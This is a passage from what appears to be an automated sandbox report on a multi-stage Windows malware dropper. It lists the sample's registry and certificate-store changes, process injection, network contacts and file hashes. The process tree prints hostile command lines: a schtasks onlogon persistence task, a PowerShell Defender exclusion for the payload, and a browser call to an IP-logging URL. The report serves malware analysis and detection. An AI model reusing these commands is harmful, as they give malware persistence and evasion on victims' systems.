| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1912 set thread context of 1360 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7C7DF041-B3CB-11EF-9C44-E61828AB23DD} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\caa4baaf544.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\6f1aa71747b4a291.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c caa4baaf544.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 621c13b77.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe
09b9624c6ac9.exe
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\caa4baaf544.exe
caa4baaf544.exe
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\6f1aa71747b4a291.exe
6f1aa71747b4a291.exe
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\e4f0738cc5646a38.exe
e4f0738cc5646a38.exe
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe
3d1f9c2a6.exe
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe
d55cc0d45c3a05.exe
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe" -a
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe
c0f099be1ace2.exe
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\24ebc9ce784c63.exe
24ebc9ce784c63.exe
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe
621c13b77.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487156 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 424
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 988
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS5FFB.tmp\Install.cmd" "
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1732 CREDAT:275457 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 104.26.4.15:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 104.26.5.15:443 | api.db-ip.com | tcp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.27.25:80 | www.maxmind.com | tcp |
| GB | 37.0.8.235:80 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | lenak513.tumblr.com | udp |
| US | 74.114.154.18:443 | lenak513.tumblr.com | tcp |
| N/A | 127.0.0.1:49262 | tcp | |
| N/A | 127.0.0.1:49264 | tcp | |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| SG | 37.0.11.8:80 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 184.50.113.144:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 72.246.29.11:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | sanctam.net | udp |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 3394285ab7e1ef48bc775f71ed7b0a76 |
| SHA1 | 646fadf1a0a0dafe07319c86de0587ed96a0fc2b |
| SHA256 | 732b086183981289f4dff07f2054fa1356bba8d975359e2f40b6f1adae084467 |
| SHA512 | 31d754a5f0f005eaf18eed0bd021e2c3698935dd51b10e7c21d4236abe875faf9945aad12e8711da9e42952ab586adf4c98f4a3d6db48e00ab53bb02b7258dc8 |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
| MD5 | 68a59b521798b22a72d30dd7ff6eb04a |
| SHA1 | 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da |
| SHA256 | e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc |
| SHA512 | 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546 |
memory/2704-51-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2704-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-59-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2704-58-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2704-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-56-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-55-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-52-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2704-50-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe
| MD5 | c0d18a829910babf695b4fdaea21a047 |
| SHA1 | 236a19746fe1a1063ebe077c8a0553566f92ef0f |
| SHA256 | 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98 |
| SHA512 | cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823 |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe
| MD5 | 80cf471e52dcc848d81092439489f12f |
